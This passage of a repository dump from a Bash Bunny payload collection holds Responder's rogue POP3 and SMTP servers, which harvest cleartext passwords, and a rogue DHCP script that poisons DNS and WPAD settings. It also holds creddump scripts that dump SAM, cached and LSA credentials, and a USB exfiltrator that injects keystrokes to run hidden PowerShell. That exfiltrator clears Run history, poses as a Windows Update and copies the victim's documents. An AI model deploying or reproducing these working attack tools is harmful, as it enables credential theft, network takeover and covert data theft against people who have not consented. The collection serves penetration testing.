Credentials[0]+":"+Credentials[1], 43 | }) 44 | 45 | ## FIXME: Close connection properly 46 | ## self.request.send(str(ditchthisconnection())) 47 | ## data = self.request.recv(1024) 48 | except Exception: 49 | pass 50 | -------------------------------------------------------------------------------- 
/payloads/library/tools_installer/tools_to_install/responder/servers/POP3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import POPOKPacket 20 | 21 | # POP3 Server class 22 | class POP3(BaseRequestHandler): 23 | def SendPacketAndRead(self): 24 | Packet = POPOKPacket() 25 | self.request.send(str(Packet)) 26 | return self.request.recv(1024) 27 | 28 | def handle(self): 29 | try: 30 | data = self.SendPacketAndRead() 31 | 32 | if data[0:4] == "USER": 33 | User = data[5:].replace("\r\n","") 34 | data = self.SendPacketAndRead() 35 | if data[0:4] == "PASS": 36 | Pass = data[5:].replace("\r\n","") 37 | 38 | SaveToDb({ 39 | 'module': 'POP3', 40 | 'type': 'Cleartext', 41 | 'client': self.client_address[0], 42 | 'user': User, 43 | 'cleartext': Pass, 44 | 'fullhash': User+":"+Pass, 45 | }) 46 | self.SendPacketAndRead() 47 | except Exception: 48 | pass 49 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/SMTP.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from base64 import b64decode 19 | from SocketServer import BaseRequestHandler 20 | from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2 21 | 22 | class ESMTP(BaseRequestHandler): 23 | 24 | def handle(self): 25 | try: 26 | self.request.send(str(SMTPGreeting())) 27 | data = self.request.recv(1024) 28 | 29 | if data[0:4] == "EHLO": 30 | self.request.send(str(SMTPAUTH())) 31 | data = self.request.recv(1024) 32 | 33 | if data[0:4] == "AUTH": 34 | self.request.send(str(SMTPAUTH1())) 35 | data = self.request.recv(1024) 36 | 37 | if data: 38 | try: 39 | User = filter(None, b64decode(data).split('\x00')) 40 | Username = User[0] 41 | Password = User[1] 42 | except: 43 | Username = b64decode(data) 44 | 45 | self.request.send(str(SMTPAUTH2())) 46 | data = self.request.recv(1024) 47 | 48 | if data: 49 | try: Password = b64decode(data) 50 | except: Password = data 51 | 52 | SaveToDb({ 53 | 'module': 'SMTP', 54 | 'type': 'Cleartext', 55 | 'client': self.client_address[0], 56 | 'user': Username, 57 | 'cleartext': Password, 58 | 
'fullhash': Username+":"+Password, 59 | }) 60 | 61 | except Exception: 62 | pass 63 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/servers/__init__.py -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/DHCP_Auto.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # This file is part of Responder. laurent.gaffie@gmail.com 3 | # 4 | # 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | 18 | # This script will try to auto-detect network parameters 19 | # to run the rogue DHCP server, to inject only your IP 20 | # address as the primary DNS server and WPAD server and 21 | # leave everything else normal. 22 | 23 | if [ -z $1 ]; then 24 | echo "usage: $0 " 25 | exit 26 | fi 27 | 28 | if [ $EUID -ne 0 ]; then 29 | echo "Must be run as root." 30 | exit 31 | fi 32 | 33 | if [ ! -d "/sys/class/net/$1" ]; then 34 | echo "Interface does not exist." 
35 | exit 36 | fi 37 | 38 | INTF=$1 39 | PATH="$PATH:/sbin" 40 | IPADDR=`ifconfig $INTF | sed -n 's/inet addr/inet/; s/inet[ :]//p' | awk '{print $1}'` 41 | NETMASK=`ifconfig $INTF | sed -n 's/.*[Mm]ask[: ]//p' | awk '{print $1}'` 42 | DOMAIN=`grep -E "^domain |^search " /etc/resolv.conf | sort | head -1 | awk '{print $2}'` 43 | DNS1=$IPADDR 44 | DNS2=`grep ^nameserver /etc/resolv.conf | head -1 | awk '{print $2}'` 45 | ROUTER=`route -n | grep ^0.0.0.0 | awk '{print $2}'` 46 | WPADSTR="http://$IPADDR/wpad.dat" 47 | if [ -z "$DOMAIN" ]; then 48 | DOMAIN=" " 49 | fi 50 | 51 | echo "Running with parameters:" 52 | echo "INTERFACE: $INTF" 53 | echo "IP ADDR: $IPADDR" 54 | echo "NETMAST: $NETMASK" 55 | echo "ROUTER IP: $ROUTER" 56 | echo "DNS1 IP: $DNS1" 57 | echo "DNS2 IP: $DNS2" 58 | echo "WPAD: $WPADSTR" 59 | echo "" 60 | 61 | 62 | echo python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\" 63 | python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\" 64 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/FindSMB2UPTime.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import sys 18 | import os 19 | import datetime 20 | import struct 21 | import socket 22 | 23 | sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))) 24 | from packets import SMB2Header, SMB2Nego, SMB2NegoData 25 | 26 | def GetBootTime(data): 27 | Filetime = int(struct.unpack('i", len(Packet)) + Packet 52 | s.send(Buffer) 53 | 54 | try: 55 | data = s.recv(1024) 56 | if data[4:5] == "\xff": 57 | print "This host doesn't support SMBv2" 58 | if data[4:5] == "\xfe": 59 | IsDCVuln(GetBootTime(data[116:124])) 60 | except Exception: 61 | s.close() 62 | raise 63 | 64 | if __name__ == "__main__": 65 | if len(sys.argv)<=1: 66 | sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address') 67 | host = sys.argv[1],445 68 | run(host) 69 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/FindSQLSrv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 
14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from socket import * 18 | 19 | print 'MSSQL Server Finder 0.1' 20 | 21 | s = socket(AF_INET,SOCK_DGRAM) 22 | s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1) 23 | s.settimeout(2) 24 | s.sendto('\x02',('255.255.255.255',1434)) 25 | 26 | try: 27 | while 1: 28 | data, address = s.recvfrom(8092) 29 | if not data: 30 | break 31 | else: 32 | print "===============================================================" 33 | print "Host details:",address[0] 34 | print data[2:] 35 | print "===============================================================" 36 | print "" 37 | except: 38 | pass 39 | 40 | 41 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/__init__.py -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/CHANGELOG: -------------------------------------------------------------------------------- 1 | Version: 0.3 Date: 8/1/2012 2 | 3 | * Fixed LM and NTLM Hash Corruption issue. Thanks to Jonathan Claudius. 4 | Closes Issue 3. 5 | 6 | Version: 0.2 Date: 2/24/2011 7 | 8 | * Fixed issue with wrong format specifier being used (L instead of I), which 9 | caused creddump to fail on 64-bit systems. 
10 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/README: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/README -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/cachedump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This file is part of creddump. 4 | # 5 | # creddump is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # creddump is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with creddump. If not, see . 
17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | 25 | import sys 26 | from framework.win32.domcachedump import dump_file_hashes 27 | 28 | if len(sys.argv) < 3: 29 | print "usage: %s bootkey " % sys.argv[0] 30 | sys.exit(1) 31 | 32 | dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2]) 33 | 34 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/__init__.py -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/types.py: -------------------------------------------------------------------------------- 1 | # This file is part of creddump. 2 | # 3 | # creddump is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # creddump is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | # GNU General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with creddump. If not, see . 
15 | 16 | """ 17 | @author: Brendan Dolan-Gavitt 18 | @license: GNU General Public License 2.0 or later 19 | @contact: bdolangavitt@wesleyan.edu 20 | """ 21 | 22 | regtypes = { 23 | '_CM_KEY_VALUE' : [ 0x18, { 24 | 'Signature' : [ 0x0, ['unsigned short']], 25 | 'NameLength' : [ 0x2, ['unsigned short']], 26 | 'DataLength' : [ 0x4, ['unsigned long']], 27 | 'Data' : [ 0x8, ['unsigned long']], 28 | 'Type' : [ 0xc, ['unsigned long']], 29 | 'Flags' : [ 0x10, ['unsigned short']], 30 | 'Spare' : [ 0x12, ['unsigned short']], 31 | 'Name' : [ 0x14, ['array', 1, ['unsigned short']]], 32 | } ], 33 | '_CM_KEY_NODE' : [ 0x50, { 34 | 'Signature' : [ 0x0, ['unsigned short']], 35 | 'Flags' : [ 0x2, ['unsigned short']], 36 | 'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']], 37 | 'Spare' : [ 0xc, ['unsigned long']], 38 | 'Parent' : [ 0x10, ['unsigned long']], 39 | 'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]], 40 | 'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]], 41 | 'ValueList' : [ 0x24, ['_CHILD_LIST']], 42 | 'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']], 43 | 'Security' : [ 0x2c, ['unsigned long']], 44 | 'Class' : [ 0x30, ['unsigned long']], 45 | 'MaxNameLen' : [ 0x34, ['unsigned long']], 46 | 'MaxClassLen' : [ 0x38, ['unsigned long']], 47 | 'MaxValueNameLen' : [ 0x3c, ['unsigned long']], 48 | 'MaxValueDataLen' : [ 0x40, ['unsigned long']], 49 | 'WorkVar' : [ 0x44, ['unsigned long']], 50 | 'NameLength' : [ 0x48, ['unsigned short']], 51 | 'ClassLength' : [ 0x4a, ['unsigned short']], 52 | 'Name' : [ 0x4c, ['array', 1, ['unsigned short']]], 53 | } ], 54 | '_CM_KEY_INDEX' : [ 0x8, { 55 | 'Signature' : [ 0x0, ['unsigned short']], 56 | 'Count' : [ 0x2, ['unsigned short']], 57 | 'List' : [ 0x4, ['array', 1, ['unsigned long']]], 58 | } ], 59 | '_CHILD_LIST' : [ 0x8, { 60 | 'Count' : [ 0x0, ['unsigned long']], 61 | 'List' : [ 0x4, ['unsigned long']], 62 | } ], 63 | } 64 | -------------------------------------------------------------------------------- 
/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/win32/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/win32/__init__.py -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/win32/rawreg.py: -------------------------------------------------------------------------------- 1 | # This file is part of creddump. 2 | # 3 | # creddump is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # creddump is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | # GNU General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with creddump. If not, see . 15 | 16 | """ 17 | @author: Brendan Dolan-Gavitt 18 | @license: GNU General Public License 2.0 or later 19 | @contact: bdolangavitt@wesleyan.edu 20 | """ 21 | 22 | from framework.newobj import Obj,Pointer 23 | from struct import unpack 24 | 25 | ROOT_INDEX = 0x20 26 | LH_SIG = unpack(". 
17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | import sys 25 | from framework.win32.lsasecrets import get_file_secrets 26 | 27 | # Hex dump code from 28 | # http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812 29 | 30 | FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) 31 | 32 | def dump(src, length=8): 33 | N=0; result='' 34 | while src: 35 | s,src = src[:length],src[length:] 36 | hexa = ' '.join(["%02X"%ord(x) for x in s]) 37 | s = s.translate(FILTER) 38 | result += "%04X %-*s %s\n" % (N, length*3, hexa, s) 39 | N+=length 40 | return result 41 | 42 | if len(sys.argv) < 3: 43 | print "usage: %s Bootkey " % sys.argv[0] 44 | sys.exit(1) 45 | 46 | secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2]) 47 | if not secrets: 48 | print "Unable to read LSA secrets. Perhaps you provided invalid hive files?" 49 | sys.exit(1) 50 | 51 | for k in secrets: 52 | print k 53 | print dump(secrets[k], length=16) 54 | 55 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/pwdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This file is part of creddump. 4 | # 5 | # creddump is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # creddump is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 
14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with creddump. If not, see . 17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | import sys 25 | from framework.win32.hashdump import dump_file_hashes 26 | 27 | if len(sys.argv) < 3: 28 | print "usage: %s bootkey SAM_File" % sys.argv[0] 29 | sys.exit(1) 30 | 31 | dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2]) 32 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/relay-dumps/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/relay-dumps/.gitignore -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/SMBFinger/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/SMBFinger/__init__.py -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/d.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 3 | cscript %~dp0\i.vbs %~dp0\e.cmd 4 | @exit 
-------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/e.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | @echo Installing Windows Update 3 | 4 | REM Delete registry keys storing Run dialog history 5 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 6 | 7 | REM Creates directory compromised of computer name, date and time 8 | REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious 9 | set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% 10 | mkdir %dst% >>nul 11 | 12 | if Exist %USERPROFILE%\Documents ( 13 | REM /C Continues copying even if errors occur. 14 | REM /Q Does not display file names while copying. 15 | REM /G Allows the copying of encrypted files to destination that does not support encryption. 16 | REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. 17 | REM /E Copies directories and subdirectories, including empty ones. 
18 | 19 | REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul 20 | 21 | REM Same as above but does not create empty directories 22 | xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul 23 | ) 24 | 25 | REM Blink CAPSLOCK key 26 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 27 | 28 | @cls 29 | @exit -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/i.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False 2 | -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: USB Exfiltration 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # Target: Windows XP SP3+ 7 | # Props: Diggster, IMcPwn 8 | # 9 | # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, 10 | # which in turn executes e.cmd invisibly using i.vbs 11 | # which in turn copies documents to the loot folder on the Bash Bunny. 
12 | # 13 | 14 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 15 | source bunny_helpers.sh 16 | 17 | LED R 18 | ATTACKMODE HID STORAGE 19 | QUACK GUI r 20 | QUACK DELAY 100 21 | QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" 22 | QUACK ENTER 23 | LED G 24 | -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/readme.md: -------------------------------------------------------------------------------- 1 | # Exfiltrator for Bash Bunnys 2 | 3 | * Author: Hak5Darren 4 | * Version: 1.1 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Exfiltrates files from the user's Documents folder. 10 | Saves them to the loot folder on the Bash Bunny USB Mass Storage partition, in a directory named after the victim hostname, date and time. 11 | 12 | ## Configuration 13 | 14 | By default the staged payload exfiltrates PDF files. Adjust the xcopy commands in e.cmd as needed. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ------------------ | -------------------------------------------- | 20 | | White (blinking) | Setup Failed. Target didn't obtain IP | 21 | | Red | Attack Setup | 22 | | Green | Attack Complete | 23 | 24 | ## Discussion 25 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40225-payload-usb_exfiltrator/ "Hak5 Forum Thread") 26 | -------------------------------------------------------------------------------- /payloads/switch1/payload.txt: -------------------------------------------------------------------------------- 1 | LED R B 2 | ATTACKMODE ECM_ETHERNET STORAGE 3 | -------------------------------------------------------------------------------- /payloads/switch2/payload.txt: -------------------------------------------------------------------------------- 1 | LED R B 2 | ATTACKMODE RNDIS_ETHERNET 3 | --------------------------------------------------------------------------------